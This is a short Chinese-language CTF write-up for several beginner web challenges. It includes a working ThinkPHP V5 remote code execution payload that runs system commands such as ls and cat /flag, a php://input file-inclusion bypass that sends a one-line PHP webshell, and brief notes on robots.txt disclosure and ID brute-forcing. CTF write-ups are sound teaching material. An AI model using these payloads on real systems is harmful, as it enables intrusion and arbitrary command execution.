baby_web
1、题目打开是
根据提示,初始页面是index.php。抓包改一下发现index.php的回包直接有flag{very_baby_web}
Training-WWW-Robots
打开题目,看到提示:
在这个小小的训练挑战中,你将学习关于机器人排除标准的知识。
robots.txt 文件被网络爬虫用来检查他们是否被允许爬行和索引你的网站或只是其中的一部分。
有时候,这些文件会显示目录结构,而不是保护内容不被爬行。
就是说robots.txt 文件有时候会暴露目录结构。
发现一个不允许访问的文件夹fl0g.php
访问一下就得到flag了。。。呃 是很简单哈。
php_rce
没提示,那就搜一下ThinkPHP V5 php_rce
发现有这个漏洞复现
用payload试一下phpinfo,可以执行
index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
可以执行那就试试其他命令咧。ls
index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20../../../../../
看到flag了 cat一下.
flag写一个 flag{thinkphp5_rce} 就够了!
http://111.200.241.244:63378/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20%20/flag
Web_php_include
文件包含的题,没啥提示。那就是要传木马
审题看到php:// 的页面,那就利用php的绕过。
大小写绕过
http://111.200.241.244:59320/?page=PHP://input
构造一句话木马,得到一个php文件
a=<?php system("ls")?>a
看文件里是啥,就拿到flag了
ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}
ics-06
提示只有一处留下攻击者痕迹
只有报表中心能点进来!
抓个包:
不同的包,还抓到用户名sunyuxiang的,但是放到ID里,啥也不是。
干脆直接0-10000爆破得了。
爆破出结果了。。
warmup
看到路径了,扫一下,看到提示flag在hint.php
目录绕过试一下就行了